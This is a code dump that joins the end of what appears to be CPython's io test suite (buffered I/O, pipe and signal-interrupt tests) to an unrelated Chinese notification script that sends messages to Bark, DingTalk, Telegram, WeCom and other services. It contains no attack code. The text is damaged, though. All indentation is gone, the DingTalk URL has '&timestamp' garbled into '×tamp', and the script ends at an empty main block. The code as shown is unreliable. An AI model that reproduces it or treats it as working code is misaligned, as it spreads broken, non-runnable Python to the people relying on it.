self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, 'wb', buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, 'wb') as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, 'w') as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, 'wb', buffering=0)
self._check_warn_on_dealloc(support.TESTFN, 'wb')
self._check_warn_on_dealloc(support.TESTFN, 'w')
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd('rb', buffering=0)
self._check_warn_on_dealloc_fd('rb')
self._check_warn_on_dealloc_fd('r')
def test_pickling(self):
for kwargs in [{'mode': 'w'}, {'mode': 'wb'}, {'mode': 'wb',
'buffering': 0}, {'mode': 'r'}, {'mode': 'rb'}, {'mode': 'rb',
'buffering': 0}, {'mode': 'w+'}, {'mode': 'w+b'}, {'mode':
'w+b', 'buffering': 0}]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16 * 1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in (9999, 73, 7574):
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
with self.open(support.TESTFN, 'xb') as f:
f.write(b'spam')
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b'spam', f.read())
def test_open_allargs(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10 ** 6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
code = (
"""if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
"""
.format_map(locals()))
res, _ = run_python_until_end('-c', code)
err = res.err.decode()
if res.rc != 0:
self.assertIn(
"Fatal Python error: could not acquire lock for <_io.BufferedWriter name='<{stream_name}>'> at interpreter shutdown, possibly due to daemon threads"
.format_map(locals()), err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 / 0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs['closefd'] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b'xy', b'xy', mode='wb', buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b'xy', b'xy', mode='wb')
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write('xy', b'xy', mode='w', encoding='ascii')
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
wio.write(data)
1 / 0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith('reentrant call'), str(exc)
)
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b'xy', mode='wb')
def test_reentrant_write_text(self):
self.check_reentrant_write('xy', mode='w', encoding='ascii')
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs['closefd'] = False
def alarm_handler(sig, frame):
os.write(w, b'bar')
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b'foo')
signal.alarm(1)
self.assertEqual(decode(rio.read(6)), 'foobar')
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode='rb')
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x, mode='r')
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module('select')
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs['closefd'] = False
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b'x', mode='wb')
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry('x', mode='w', encoding='latin1')
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest, CBufferedReaderTest,
PyBufferedReaderTest, CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest, CBufferedRandomTest,
PyBufferedRandomTest, StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest, CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest)
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ['IncrementalNewlineDecoder']
c_io_ns = {name: getattr(io, name) for name in all_members}
py_io_ns = {name: getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs['C' + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs['Py' + x.__name__]) for x in mocks)
py_io_ns['open'] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith('C'):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith('Py'):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == '__main__':
unittest.main()
notify_mtr.py
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import base64
import hashlib
import hmac
import json
import os
import re
import threading
import time
import traceback
import urllib.parse
import requests
import tomli
from utils_env import get_file_path
link_reg = re.compile(r"<a href=['|\"](.+)['|\"]>(.+)<\s?/a>")
bold_reg = re.compile(r"<b>\s*(.+)\s*<\s?/b>")
list_reg = re.compile(r"^(\d+\.|-)\s.+$")
def html2md(content: str) -> str:
content = "\n".join(map(lambda x: x if list_reg.fullmatch(x) else x + "\n", content.split("\n")))
return bold_reg.sub(r"### **\1**", link_reg.sub(r"[\2](\1)", content))
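# Illustrative examples of html2md (the inputs here are made up, not from the
# original script):
#   html2md('<b>Daily Report</b>')                  -> '### **Daily Report**\n'
#   html2md('<a href="https://example.com">x</a>')  -> '[x](https://example.com)\n'
# Lines matching list_reg (e.g. '- item' or '1. item') are kept as-is, while
# every other line gets an extra newline appended so paragraphs stay separated.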
# The original built-in print and a lock shared by all threads
_print = print
mutex = threading.Lock()
# Define a thread-safe replacement for print
def print(text, *args, **kw):
"""
使输出有序进行,不出现多线程同一时间输出导致错乱的问题。
"""
with mutex:
_print(text, *args, **kw)
# Notification services
# fmt: off
push_config = {
    'HITOKOTO': False,  # enable Hitokoto (append a random quote to the message)
    'BARK_PUSH': '',  # bark server address or device key, e.g. https://api.day.app/DxHcxxxxxRxxxxxxcm
    'BARK_ARCHIVE': '',  # whether bark pushes are archived
    'BARK_GROUP': '',  # bark push group
    'BARK_SOUND': '',  # bark push sound
    'CONSOLE': True,  # print to the console
    'DD_BOT_SECRET': '',  # DingTalk bot DD_BOT_SECRET
    'DD_BOT_TOKEN': '',  # DingTalk bot DD_BOT_TOKEN
    'FSKEY': '',  # Feishu (Lark) bot FSKEY
    'GOBOT_URL': '',  # go-cqhttp endpoint
    # push to a personal QQ account: http://127.0.0.1/send_private_msg
    # push to a QQ group: http://127.0.0.1/send_group_msg
    'GOBOT_QQ': '',  # go-cqhttp target group or user
    # when GOBOT_URL ends with /send_private_msg, set user_id=<personal QQ>
    # when it ends with /send_group_msg, set group_id=<QQ group>
    'GOBOT_TOKEN': '',  # go-cqhttp access_token
    'IGOT_PUSH_KEY': '',  # IGOT_PUSH_KEY for the iGot aggregated push service
    'PUSH_KEY': '',  # ServerChan PUSH_KEY (works with both the legacy and the Turbo version)
    'PUSH_PLUS_TOKEN': '',  # pushplus WeChat push user token
    'PUSH_PLUS_USER': '',  # pushplus WeChat push group code
    'QMSG_KEY': '',  # Qmsg QMSG_KEY
    'QMSG_TYPE': '',  # Qmsg QMSG_TYPE
    'QYWX_AM': '',  # WeCom (WeChat Work) application push
    'QYWX_KEY': '',  # WeCom (WeChat Work) group bot key
    'TG_BOT_TOKEN': '',  # Telegram bot TG_BOT_TOKEN, e.g. 1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
    'TG_USER_ID': '',  # Telegram TG_USER_ID, e.g. 1434078534
    'TG_API_HOST': '',  # Telegram proxy API host
    'TG_PROXY_AUTH': '',  # Telegram proxy auth credentials
    'TG_PROXY_HOST': '',  # Telegram proxy host (TG_PROXY_HOST)
    'TG_PROXY_PORT': '',  # Telegram proxy port (TG_PROXY_PORT)
}
notify_function = []
# fmt: on
# First, read values from the panel variables or the GitHub Actions environment
for k in push_config:
if v := os.getenv(k):
push_config[k] = v
# Then read values from the config file (these override the environment variables)
CONFIG_PATH = os.getenv("NOTIFY_CONFIG_PATH") or get_file_path("notify.toml")
if os.path.exists(CONFIG_PATH):
print(f"通知配置文件存在:{CONFIG_PATH}。")
try:
for k, v in dict(tomli.load(open(CONFIG_PATH, "rb"))).items():
if k in push_config:
push_config[k] = v
except tomli.TOMLDecodeError:
print(
f"错误:配置文件 {CONFIG_PATH} 格式不对,请学习 https://toml.io/cn/v1.0.0\n错误信息:\n{traceback.format_exc()}"
)
elif CONFIG_PATH:
print(f"{CONFIG_PATH} 配置的通知文件不存在,请检查文件位置或删除对应环境变量!")
def bark(title: str, content: str) -> None:
"""
    Push a message via Bark.
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH").rstrip("/")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
datas = requests.get(url, timeout=15).json()
if datas.get("code") == 200:
print("bark 推送成功!")
elif datas.get("code") == 400:
print("bark 推送失败!找不到 Key 对应的 DeviceToken。")
else:
print(f"bark 推送失败!响应数据:{datas}")
def console(title: str, content: str) -> None:
"""
    Print the message to the console.
"""
print(f"{title}\n\n{content}")
def dingding_bot(title: str, content: str) -> None:
"""
    Push a message via the DingTalk bot.
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "markdown", "markdown": {"text": html2md(content), "title": title}}
datas = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if datas.get("errcode") == 0:
print("钉钉机器人 推送成功!")
else:
print(f"钉钉机器人 推送失败!响应数据:{datas}")
def feishu_bot(title: str, content: str) -> None:
"""
    Push a message via the Feishu bot.
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
    datas = requests.post(url, data=json.dumps(data), timeout=15).json()
if datas.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print(f"飞书 推送失败!响应数据:{datas}")
def go_cqhttp(title: str, content: str) -> None:
"""
    Push a message via go-cqhttp.
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
datas = requests.get(url, timeout=15).json()
if datas.get("status") == "ok":
print("go-cqhttp 推送成功!")
else:
print(f"go-cqhttp 推送失败!响应数据:{datas}")
def iGot(title: str, content: str) -> None:
"""
    Push a message via iGot.
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
datas = requests.post(url, data=data, headers=headers, timeout=15).json()
if datas.get("ret") == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!错误信息:{datas.get("errMsg")}')
def serverJ(title: str, content: str) -> None:
"""
    Push a message via ServerChan (serverJ).
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
if push_config.get("PUSH_KEY").index("SCT") != -1:
url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
else:
url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send'
datas = requests.post(url, data=data, timeout=15).json()
if datas.get("errno") == 0 or datas.get("code") == 0:
print("serverJ 推送成功!")
elif datas.get("code") == 40001:
print("serverJ 推送失败!PUSH_KEY 错误。")
else:
print(f'serverJ 推送失败!错误码:{datas.get("message")}')
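# Hedged sketch (not part of the original script): the endpoint selection serverJ uses
# above, as a standalone helper. Keys containing "SCT" (Turbo-style keys) go to
# sctapi.ftqq.com; anything else is treated as a legacy key. The example key is fake.
def _serverj_endpoint(push_key: str) -> str:
    if "SCT" in push_key:
        return f"https://sctapi.ftqq.com/{push_key}.send"
    return f"https://sc.ftqq.com/{push_key}.send"
# e.g. _serverj_endpoint("SCT123456FAKE") -> "https://sctapi.ftqq.com/SCT123456FAKE.send"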
def pushplus_bot(title: str, content: str) -> None:
"""
    Push a message via pushplus (push+).
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
datas = requests.post(url=url, data=body, headers=headers, timeout=15).json()
if datas.get("code") == 200:
print("PUSHPLUS 推送成功!")
elif datas.get("code") == 600:
url2 = "http://pushplus.hxtrip.com/send"
headers["Accept"] = "application/json"
datas2 = requests.post(url=url2, data=body, headers=headers, timeout=15).json()
if datas2.get("code") == 200:
print("PUSHPLUS(hxtrip) 推送成功!")
elif datas2.get("code") == 600:
print("PUSHPLUS 推送失败!PUSH_PLUS_TOKEN 错误。")
else:
print(f"PUSHPLUS(hxtrip) 推送失败!响应数据:{datas2}")
else:
print(f"PUSHPLUS 推送失败!响应数据:{datas}")
def qmsg_bot(title: str, content: str) -> None:
"""
    Push a message via Qmsg.
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
datas = requests.post(url=url, params=payload, timeout=15).json()
if datas.get("code") == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!错误信息:{datas.get("reason")}')
def wecom_app(title: str, content: str) -> None:
"""
    Push a message via a WeCom (enterprise WeChat) application.
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
    # QYWX_AM must have 4 or 5 comma-separated fields; the original chained comparison
    # only caught the "more than 5" case.
    if not 4 <= len(QYWX_AM_AY) <= 5:
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
    # If media_id is not configured, fall back to sending a plain text message
if not media_id:
message = title + "\n\n" + content
datas = wx.send_text(message, touser)
else:
datas = wx.send_mpnews(title, content, media_id, touser)
if datas == "ok":
print("企业微信推送成功!")
else:
print(f"企业微信推送失败!错误信息:{datas}")
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values, timeout=15)
datas = json.loads(req.text)
return datas.get("access_token")
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values), "utf-8")
datas = requests.post(send_url, send_msges, timeout=15).json()
return datas.get("errmsg")
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values), "utf-8")
datas = requests.post(send_url, send_msges, timeout=15).json()
return datas.get("errmsg")
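# Hedged usage sketch (not part of the original script): how wecom_app drives the WeCom
# class above. The corpid/corpsecret/agentid values are placeholders; a real QYWX_AM
# string has the form "corpid,corpsecret,touser,agentid[,media_id]".
def _demo_wecom_text_push() -> None:
    wx = WeCom("ww_fake_corpid", "fake_corpsecret", "1000002")
    # send_text returns the "errmsg" field of WeCom's JSON response; "ok" means success.
    result = wx.send_text("title\n\ncontent", touser="@all")
    print(result)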
def wecom_bot(title: str, content: str) -> None:
"""
    Push a message via a WeCom (enterprise WeChat) group bot.
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
datas = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if datas.get("errcode") == 0:
print("企业微信机器人 推送成功!")
else:
print(f"企业微信机器人 推送失败!响应数据:{datas}")
def telegram_bot(title: str, content: str) -> None:
"""
    Push a message via a Telegram bot.
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"<b><u>{title}</u></b>\n\n{content}",
"disable_web_page_preview": "true",
"parse_mode": "HTML",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get("TG_PROXY_HOST"):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
datas = requests.post(
url=url, headers=headers, params=payload, proxies=proxies, timeout=15
).json()
if datas.get("ok") == True:
print("tg 推送成功!")
elif datas.get("error_code") == 400:
print("tg 推送失败!请主动给 bot 发送一条消息并检查接收用户 TG_USER_ID 是否正确。")
elif datas.get("error_code") == 401:
print("tg 推送失败!TG_BOT_TOKEN 填写错误。")
else:
print(f"tg 推送失败!响应数据:{datas}")
def one() -> str:
"""
    Fetch a single hitokoto (random quote).
    :return: the quote text, or an empty string if the request fails.
"""
try:
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
except requests.exceptions.ConnectionError:
return ""
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
def excepthook(args, /):
if issubclass(args.exc_type, requests.exceptions.RequestException):
print(
f"网络异常,请检查你的网络连接、推送服务器和代理配置,该错误和账号配置无关。信息:{str(args.exc_type)}, {args.thread.name}"
)
elif issubclass(args.exc_type, json.JSONDecodeError):
print(
f"推送返回值非 json 格式,请检查网址和账号是否填写正确。信息:{str(args.exc_type)}, {args.thread.name}"
)
else:
global default_hook
default_hook(args)
default_hook = threading.excepthook
threading.excepthook = excepthook
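# Hedged illustration (not part of the original script): with the hook installed above,
# a requests failure inside a push thread is reported through the friendly message in
# excepthook instead of a raw traceback. 192.0.2.1 is a reserved, unroutable test address.
def _demo_excepthook() -> None:
    t = threading.Thread(
        target=lambda: requests.get("http://192.0.2.1", timeout=1),
        name="excepthook-demo",
    )
    t.start()
    t.join()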
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
content += "\n\n> " + one() if hitokoto else ""
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
